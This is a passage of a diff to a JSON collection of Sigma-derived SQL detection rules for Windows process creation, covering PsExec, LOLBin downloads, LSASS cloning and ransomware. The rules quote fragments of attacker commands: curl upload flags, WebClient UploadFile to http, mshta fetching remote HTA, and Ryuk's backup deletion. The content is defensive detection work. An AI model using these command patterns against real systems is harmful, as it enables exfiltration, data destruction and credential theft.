LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentUser LIKE '%AUTHORI%' ESCAPE '\\' OR ParentUser LIKE '%AUTORI%' ESCAPE '\\') AND (ParentUser LIKE '%\\\\NETWORK SERVICE' ESCAPE '\\' OR ParentUser LIKE '%\\\\LOCAL SERVICE' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND (User LIKE '%\\\\SYSTEM' ESCAPE '\\' OR User LIKE '%\\\\Système' ESCAPE '\\' OR User LIKE '%\\\\СИСТЕМА' ESCAPE '\\') AND IntegrityLevel = 'System') AND NOT ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%DavSetCookie%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_java_keytool_susp_child_process.yml" + "filename": "proc_creation_win_susp_child_process_as_system_.yml" }, { - "title": "Suspicious Plink Port Forwarding", - "id": "48a61b29-389f-4032-b317-b30de6b95314", - "status": "test", - "description": "Detects suspicious Plink tunnel port forwarding to a local port", - "author": "Florian Roth (Nextron Systems)", + "title": "PsExec Service Execution", + "id": "fdfcbd78-48f1-4a4b-90ac-d82241e368c5", + "status": "experimental", + "description": "Detects launch of the PSEXESVC service, which means that this system was the target of a 
psexec remote execution", + "author": "Thomas Patzke, Romaissa Adjailia, Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001" + "attack.execution" ], "falsepositives": [ - "Administrative activity using a remote port forwarding to a local port" + "Legitimate administrative tasks" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description = 'Command-line SSH, Telnet, and Rlogin client' AND CommandLine LIKE '% -R %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 'C:\\\\Windows\\\\PSEXESVC.exe' ESCAPE '\\' OR OriginalFileName = 'psexesvc.exe'))" ], - "filename": "proc_creation_win_plink_port_forwarding.yml" + "filename": "proc_creation_win_sysinternals_psexesvc.yml" }, { "title": "PUA - NirCmd Execution As LOCAL SYSTEM", 
@@ -11988,339 +11859,363 @@ "filename": "proc_creation_win_pua_nircmd_as_system.yml" }, { - "title": "HackTool - SysmonEOP Execution", - "id": "8a7e90c5-fe6e-45dc-889e-057fe4378bd9", + "title": "Renamed PAExec Execution", + "id": "c4e49831-1496-40cf-8ce1-b53f942b02f9", + "status": "test", + "description": "Detects execution of renamed version of PAExec. Often used by attackers", + "author": "Florian Roth (Nextron Systems), Jason Lynch", + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ], + "falsepositives": [ + "Weird admins that rename their tools", + "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", + "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'PAExec Application' OR OriginalFileName = 'PAExec.exe' OR Product LIKE '%PAExec%' ESCAPE '\\' OR Imphash IN ('11D40A7B7876288F919AB819CC2D9802', '6444f8a34e99b8f7d9647de66aabe516', 'dfd6aa3f7b2b1035b76b718f1ddc689f', '1a6cca4d5460b1710a12dea39e4a592c') OR (Hashes LIKE '%IMPHASH=11D40A7B7876288F919AB819CC2D9802%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6444f8a34e99b8f7d9647de66aabe516%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1a6cca4d5460b1710a12dea39e4a592c%' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\paexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\PAExec-%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_renamed_paexec.yml" + }, + { + "title": "Msiexec Quiet Installation", + "id": "79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5", "status": "experimental", - "description": "Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120", - "author": "Florian Roth (Nextron Systems)", + 
"description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", + "author": "frack113", "tags": [ - "cve.2022.41120", - "attack.t1068", - "attack.privilege_escalation" + "attack.defense_evasion", + "attack.t1218.007" ], "falsepositives": [ - "Unlikely" + "WindowsApps installing updates via the quiet flag" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\SysmonEOP.exe' ESCAPE '\\' OR Hashes IN ('IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5', 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC') OR Imphash IN ('22f4089eb8aba31e1bb162c6d9bf72e5', '5123fa4c4384d431cd0d893eeb49bbec')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName = 'msiexec.exe') AND (CommandLine LIKE '%/i%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/package%' ESCAPE '\\' OR CommandLine LIKE '%-package%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/j%' ESCAPE '\\' OR CommandLine LIKE '%-j%' ESCAPE '\\') AND (CommandLine LIKE '%/q%' ESCAPE '\\' OR CommandLine LIKE '%-q%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\CCM\\\\Ccm32BitLauncher.exe' ESCAPE '\\' AND IntegrityLevel = 'System')))" ], - "filename": "proc_creation_win_hktl_sysmoneop.yml" + "filename": "proc_creation_win_msiexec_install_quiet.yml" }, { - "title": "Permission Misconfiguration Reconnaissance Via Findstr.EXE", - "id": 
"47e4bab7-c626-47dc-967b-255608c9a920", + "title": "Arbitrary File Download Via MSPUB.EXE", + "id": "3b3c7f55-f771-4dd6-8a6e-08d057a17caf", "status": "experimental", - "description": "Detects usage of findstr with the \"EVERYONE\" or \"BUILTIN\" keywords. This is seen being used in combination with \"icacls\" to look for misconfigured files or folders permissions", + "description": "Detects usage of \"MSPUB\" (Microsoft Publisher) to download arbitrary files", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.006" + "attack.defense_evasion", + "attack.execution", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%\"Everyone\"%' ESCAPE '\\' OR CommandLine LIKE '%''Everyone''%' ESCAPE '\\' OR CommandLine LIKE '%\"BUILTIN\\\\\"%' ESCAPE '\\' OR CommandLine LIKE '%''BUILTIN\\\\''%' ESCAPE '\\')) OR (CommandLine LIKE '%icacls %' ESCAPE '\\' AND CommandLine LIKE '%findstr %' ESCAPE '\\' AND CommandLine LIKE '%Everyone%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR OriginalFileName = 'MSPUB.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_findstr_recon_everyone.yml" + "filename": "proc_creation_win_lolbin_mspub_download.yml" }, { - "title": "Potential Data Exfiltration Via Curl.EXE", - "id": "00bca14a-df4e-4649-9054-3f2aa676bc04", + "title": "Sysmon Driver Unloaded Via Fltmc.EXE", + "id": "4d7cda18-1b12-4e52-b45c-d28653210df8", "status": "test", - "description": "Detects the execution of the \"curl\" process with \"upload\" flags. 
Which might indicate potential data exfiltration", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects possible Sysmon filter driver unloaded via fltmc.exe", + "author": "Kirill Kiryanov, oscd.community", "tags": [ - "attack.exfiltration", - "attack.t1567", - "attack.t1105" + "attack.defense_evasion", + "attack.t1070", + "attack.t1562", + "attack.t1562.002" ], "falsepositives": [ - "Scripts created by developers and admins" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -F %' ESCAPE '\\' OR CommandLine LIKE '% --form%' ESCAPE '\\' OR CommandLine LIKE '% -T %' ESCAPE '\\' OR CommandLine LIKE '% --upload-file %' ESCAPE '\\' OR CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\' OR CommandLine LIKE '% --data-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND (CommandLine LIKE '%unload%' ESCAPE '\\' AND CommandLine LIKE '%sysmon%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_curl_fileupload.yml" + "filename": "proc_creation_win_fltmc_unload_driver_sysmon.yml" }, { - "title": "HackTool - RedMimicry Winnti Playbook Execution", - "id": "95022b85-ff2a-49fa-939a-d7b8f56eeb9b", - "status": "test", - "description": "Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility", - "author": "Alexander Rausch", + "title": "Potential Binary Impersonating Sysinternals Tools", + "id": "7cce6fc8-a07f-4d84-a53e-96e1879843c9", + "status": "experimental", + "description": "Detects binaries that use the same name as legitimate sysinternals tools to evade detection", + "author": "frack113", "tags": [ "attack.execution", 
"attack.defense_evasion", - "attack.t1106", - "attack.t1059.003", - "attack.t1218.011" + "attack.t1218", + "attack.t1202" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%gthread-3.6.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat%' ESCAPE '\\' OR CommandLine LIKE '%sigcmm-2.4.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR Image LIKE '%\\\\accesschk64.exe' ESCAPE '\\' OR Image LIKE '%\\\\AccessEnum.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADInsight.exe' ESCAPE '\\' OR Image LIKE '%\\\\ADInsight64.exe' ESCAPE '\\' OR Image LIKE '%\\\\adrestore.exe' ESCAPE '\\' OR Image LIKE '%\\\\adrestore64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Autologon.exe' ESCAPE '\\' OR Image LIKE '%\\\\Autologon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Autoruns.exe' ESCAPE '\\' OR Image LIKE '%\\\\Autoruns64.exe' ESCAPE '\\' OR Image LIKE '%\\\\autorunsc.exe' ESCAPE '\\' OR Image LIKE '%\\\\autorunsc64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Bginfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\Bginfo64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Cacheset.exe' ESCAPE '\\' OR Image LIKE '%\\\\Cacheset64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Clockres.exe' ESCAPE '\\' OR Image LIKE '%\\\\Clockres64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Contig.exe' ESCAPE '\\' OR Image LIKE '%\\\\Contig64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Coreinfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\Coreinfo64.exe' ESCAPE '\\' OR Image LIKE '%\\\\CPUSTRES.EXE' ESCAPE '\\' OR Image LIKE '%\\\\CPUSTRES64.EXE' ESCAPE '\\' OR Image LIKE '%\\\\ctrl2cap.exe' ESCAPE '\\' OR Image 
LIKE '%\\\\Dbgview.exe' ESCAPE '\\' OR Image LIKE '%\\\\dbgview64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktops.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktops64.exe' ESCAPE '\\' OR Image LIKE '%\\\\disk2vhd.exe' ESCAPE '\\' OR Image LIKE '%\\\\disk2vhd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\diskext.exe' ESCAPE '\\' OR Image LIKE '%\\\\diskext64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Diskmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\Diskmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\DiskView.exe' ESCAPE '\\' OR Image LIKE '%\\\\DiskView64.exe' ESCAPE '\\' OR Image LIKE '%\\\\du.exe' ESCAPE '\\' OR Image LIKE '%\\\\du64.exe' ESCAPE '\\' OR Image LIKE '%\\\\efsdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\FindLinks.exe' ESCAPE '\\' OR Image LIKE '%\\\\FindLinks64.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\' OR Image LIKE '%\\\\hex2dec.exe' ESCAPE '\\' OR Image LIKE '%\\\\hex2dec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\junction.exe' ESCAPE '\\' OR Image LIKE '%\\\\junction64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ldmdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\listdlls.exe' ESCAPE '\\' OR Image LIKE '%\\\\listdlls64.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd.exe' ESCAPE '\\' OR Image LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\loadOrd.exe' ESCAPE '\\' OR Image LIKE '%\\\\loadOrd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\loadOrdC.exe' ESCAPE '\\' OR Image LIKE '%\\\\loadOrdC64.exe' ESCAPE '\\' OR Image LIKE '%\\\\logonsessions.exe' ESCAPE '\\' OR Image LIKE '%\\\\logonsessions64.exe' ESCAPE '\\' OR Image LIKE '%\\\\movefile.exe' ESCAPE '\\' OR Image LIKE '%\\\\movefile64.exe' ESCAPE '\\' OR Image LIKE '%\\\\notmyfault.exe' ESCAPE '\\' OR Image LIKE '%\\\\notmyfault64.exe' ESCAPE '\\' OR Image LIKE '%\\\\notmyfaultc.exe' ESCAPE '\\' OR Image LIKE '%\\\\notmyfaultc64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntfsinfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\ntfsinfo64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pendmoves.exe' ESCAPE '\\' 
OR Image LIKE '%\\\\pendmoves64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pipelist.exe' ESCAPE '\\' OR Image LIKE '%\\\\pipelist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\portmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Procmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\Procmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psExec.exe' ESCAPE '\\' OR Image LIKE '%\\\\psExec64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psfile.exe' ESCAPE '\\' OR Image LIKE '%\\\\psfile64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psGetsid.exe' ESCAPE '\\' OR Image LIKE '%\\\\psGetsid64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psInfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\psInfo64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pskill.exe' ESCAPE '\\' OR Image LIKE '%\\\\pskill64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pslist.exe' ESCAPE '\\' OR Image LIKE '%\\\\pslist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psLoggedon.exe' ESCAPE '\\' OR Image LIKE '%\\\\psLoggedon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR Image LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR Image LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psping.exe' ESCAPE '\\' OR Image LIKE '%\\\\psping64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psService.exe' ESCAPE '\\' OR Image LIKE '%\\\\psService64.exe' ESCAPE '\\' OR Image LIKE '%\\\\psshutdown.exe' ESCAPE '\\' OR Image LIKE '%\\\\psshutdown64.exe' ESCAPE '\\' OR Image LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR Image LIKE '%\\\\pssuspend64.exe' ESCAPE '\\' OR Image LIKE '%\\\\RAMMap.exe' ESCAPE '\\' OR Image LIKE '%\\\\RDCMan.exe' ESCAPE '\\' OR Image LIKE '%\\\\RegDelNull.exe' ESCAPE '\\' OR Image LIKE '%\\\\RegDelNull64.exe' ESCAPE '\\' OR Image LIKE '%\\\\regjump.exe' ESCAPE '\\' OR Image LIKE '%\\\\ru.exe' ESCAPE '\\' OR Image LIKE '%\\\\ru64.exe' ESCAPE '\\' OR Image 
LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdelete64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ShareEnum.exe' ESCAPE '\\' OR Image LIKE '%\\\\ShareEnum64.exe' ESCAPE '\\' OR Image LIKE '%\\\\shellRunas.exe' ESCAPE '\\' OR Image LIKE '%\\\\sigcheck.exe' ESCAPE '\\' OR Image LIKE '%\\\\sigcheck64.exe' ESCAPE '\\' OR Image LIKE '%\\\\streams.exe' ESCAPE '\\' OR Image LIKE '%\\\\streams64.exe' ESCAPE '\\' OR Image LIKE '%\\\\strings.exe' ESCAPE '\\' OR Image LIKE '%\\\\strings64.exe' ESCAPE '\\' OR Image LIKE '%\\\\sync.exe' ESCAPE '\\' OR Image LIKE '%\\\\sync64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\tcpvcon.exe' ESCAPE '\\' OR Image LIKE '%\\\\tcpvcon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\tcpview.exe' ESCAPE '\\' OR Image LIKE '%\\\\tcpview64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Testlimit.exe' ESCAPE '\\' OR Image LIKE '%\\\\Testlimit64.exe' ESCAPE '\\' OR Image LIKE '%\\\\vmmap.exe' ESCAPE '\\' OR Image LIKE '%\\\\vmmap64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Volumeid.exe' ESCAPE '\\' OR Image LIKE '%\\\\Volumeid64.exe' ESCAPE '\\' OR Image LIKE '%\\\\whois.exe' ESCAPE '\\' OR Image LIKE '%\\\\whois64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Winobj.exe' ESCAPE '\\' OR Image LIKE '%\\\\Winobj64.exe' ESCAPE '\\' OR Image LIKE '%\\\\ZoomIt.exe' ESCAPE '\\' OR Image LIKE '%\\\\ZoomIt64.exe' ESCAPE '\\') AND NOT ((Company IN ('Sysinternals - www.sysinternals.com', 'Sysinternals')) OR (Company = '')))" ], - "filename": "proc_creation_win_hktl_redmimicry_winnti_playbook.yml" + "filename": "proc_creation_win_sysinternals_tools_masquerading.yml" }, { - "title": "HackTool - PurpleSharp Execution", - "id": "ff23ffbc-3378-435e-992f-0624dcf93ab4", + "title": "MMC20 Lateral Movement", + "id": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", "status": "test", - "description": "Detects the execution of the PurpleSharp adversary simulation tool", - "author": "Florian Roth (Nextron Systems)", + 
"description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", + "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", "tags": [ - "attack.t1587", - "attack.resource_development" + "attack.execution", + "attack.t1021.003" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\purplesharp%' ESCAPE '\\' OR OriginalFileName = 'PurpleSharp.exe' OR (CommandLine LIKE '%xyz123456.exe%' ESCAPE '\\' OR CommandLine LIKE '%PurpleSharp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\mmc.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_purplesharp_indicators.yml" + "filename": "proc_creation_win_mmc_mmc20_lateral_movement.yml" }, { - "title": "Potential Ryuk Ransomware Activity", - "id": "c37510b8-2107-4b78-aa32-72f251e7a844", - "status": "stable", - "description": "Detects Ryuk ransomware activity", - "author": "Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential Credential Dumping Via LSASS Process Clone", + "id": "c8da0dfd-4ed0-4b68-962d-13c9c884384e", + "status": "test", + "description": "Detects a suspicious LSASS process process clone that could be a sign of credential dumping activity", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.credential_access", + "attack.t1003", + "attack.t1003.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = 
'1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\users\\\\Public\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%del /s /f /q c:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bac%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bak%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bkf%' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\' AND CommandLine LIKE '% /y%' ESCAPE '\\' AND (CommandLine LIKE '%samss%' ESCAPE '\\' OR CommandLine LIKE '%audioendpointbuilder%' ESCAPE '\\' OR CommandLine LIKE '%unistoresvc\\_%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_ryuk.yml" + "filename": "proc_creation_win_susp_lsass_clone.yml" }, { - "title": "Potential Baby Shark Malware Activity", - "id": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", - "status": "test", - "description": "Detects activity that could be related to Baby Shark malware", + "title": "File With Suspicious Extension Downloaded Via Bitsadmin", + "id": "5b80a791-ad9b-4b75-bcc1-ad4e1e89c200", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file with a suspicious extension", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.discovery", - "attack.t1012", - "attack.t1059.003", - "attack.t1059.001", - "attack.t1218.005" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 
'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%powershell.exe mshta.exe http%' ESCAPE '\\' AND CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%reg query \"HKEY\\_CURRENT\\_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Default\"%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c taskkill /im cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%(New-Object System.Net.WebClient).UploadFile(''http%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.asax%' ESCAPE '\\' OR CommandLine LIKE '%.ashx%' ESCAPE '\\' OR CommandLine LIKE '%.asmx%' ESCAPE '\\' OR CommandLine LIKE '%.asp%' ESCAPE '\\' OR CommandLine LIKE '%.aspx%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cfm%' ESCAPE '\\' OR CommandLine LIKE '%.cgi%' ESCAPE '\\' OR CommandLine LIKE '%.chm%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.jsp%' ESCAPE '\\' OR CommandLine LIKE '%.jspx%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.psm1%' ESCAPE '\\' OR CommandLine LIKE '%.scf%' ESCAPE '\\' OR CommandLine LIKE '%.sct%' ESCAPE '\\' OR CommandLine LIKE '%.txt%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.war%' ESCAPE '\\' OR CommandLine LIKE '%.wsf%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.zip%' ESCAPE '\\' OR CommandLine LIKE '%.rar%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\'))" ], - "filename": 
